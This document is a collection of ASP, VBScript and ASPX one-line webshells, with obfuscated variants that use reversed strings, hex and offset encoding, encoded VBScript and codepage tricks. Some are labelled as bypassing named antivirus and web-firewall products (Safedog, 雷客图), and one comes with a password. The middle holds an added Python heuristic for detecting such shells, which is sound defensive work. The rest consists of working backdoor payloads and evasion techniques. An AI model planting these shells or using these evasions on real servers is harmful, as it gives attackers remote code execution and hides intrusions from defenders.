A collection of ASP one-line webshells:
<%eval request("chopper")%>
<%execute request("chopper")%>
<%execute(request("chopper"))%>
<%ExecuteGlobal request("chopper")%>
<%Eval(Request(chr(35)))%>
<%dy=request("c")%><%Eval(dy)%>
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
<% if Request("c")<>"" then ExecuteGlobal request("c") end if %>
<%execute request("c")%><%'<% loop <%:%>
< %'<% loop <%:%><%execute request("a")%>
<script language=vbs runat=server>eval(request("c"))</script>
<script language=VBScript runat=server>execute request("#")</script>
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%execute(unescape("eval%20request%28%22aaa%22%29"))%>
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>
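The code below reverses "eval request(/*/z/*/)" into ")/*/z/*/(tseuqer lave" to evade signature-based detection. When the script is accessed, its code is dynamically decoded and restored to the original one-line backdoor. Currently more than 90% of unknown and mutated backdoors use this kind of dynamic decoding technique.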
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"*",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>
Password: z
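The dynamic decoding described above defeats a literal match on "eval request", so detection has to key on the execution sink and undo the encoding of string literals before looking for keywords. The Python heuristic below is an added example, not part of the original collection; its rule set, function names and the benign sample are assumptions, and it goes one step beyond the reversed string by also decoding the hex literal used by a later sample on this page:

```python
import re

# Match the execution sinks themselves rather than the literal "eval request" signature.
# The lookbehind skips method calls such as ADO's conn.Execute(sql).
SINK = re.compile(r"(?<![.\w])(?:execute(?:global)?|eval)\b|\.executestatement\b", re.I)
INPUT = re.compile(r"\b(?:request|session)\b", re.I)
DECODER = re.compile(r"\b(?:strreverse|unescape|chrw?)\s*\(|VBScript\.Encode|codepage\s*=\s*65000", re.I)
STRING = re.compile(r'"((?:[^"]|"")*)"')   # VBScript literal, "" is an escaped quote
KEYWORDS = ("execute", "eval", "request")


def hidden_keywords(source):
    """Keywords that appear only after reversing or hex-decoding a string literal."""
    found = set()
    for literal in STRING.findall(source):
        decoded = [literal[::-1]]
        if len(literal) >= 8 and len(literal) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", literal):
            decoded.append(bytes.fromhex(literal).decode("latin-1"))
        for text in decoded:
            found.update(k for k in KEYWORDS if k in text.lower())
    return found


def scan(source):
    """Return the indicators found in one ASP source string plus a heuristic verdict."""
    result = {
        "sink": bool(SINK.search(source)),
        "reads_input": bool(INPUT.search(source)),
        "decoder": bool(DECODER.search(source)),
        "hidden": sorted(hidden_keywords(source)),
    }
    result["suspicious"] = result["sink"] and bool(
        result["reads_input"] or result["decoder"] or result["hidden"])
    return result


# Constructed inputs: two samples quoted from this page and one benign ADO query.
SAMPLES = {
    "reversed": 'Function MorfiCoder(Code)\nMorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"*",vbCrlf)\n'
                'End Function\nExecute MorfiCoder(")/*/z/*/(tseuqer lave")',
    "hex": 'password=Request("class")\nExecute(AACode("457865637574652870617373776F726429"))',
    "benign": '<% Set rs = conn.Execute("SELECT name FROM users WHERE id=" & CLng(Request("id"))) %>',
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, scan(text))
```

The verdict is a triage signal for manual review of files under the web root, not proof of compromise: legitimate code that calls Execute on its own strings will also be flagged.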
One-line webshells that can evade 雷客图:
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>
<%
password=Request("class")
Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function
%>
<%
password=Request("class")
Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function
%>
Simple ASPX antivirus evasion
<%@ Page Language="Jscript"%> <% var a = Request.Item["M"]; var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";//this is mainly the part that matters, the other parts do not seem to be checked eval(a,b); Response.Write("Test"); %>
One-liners that bypass Safedog:
<% dim play ' ' '''''''''''''''''' ''''''''' play = request("#") %> Error <% execute(play) %>
<%@codepage=65000%> <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>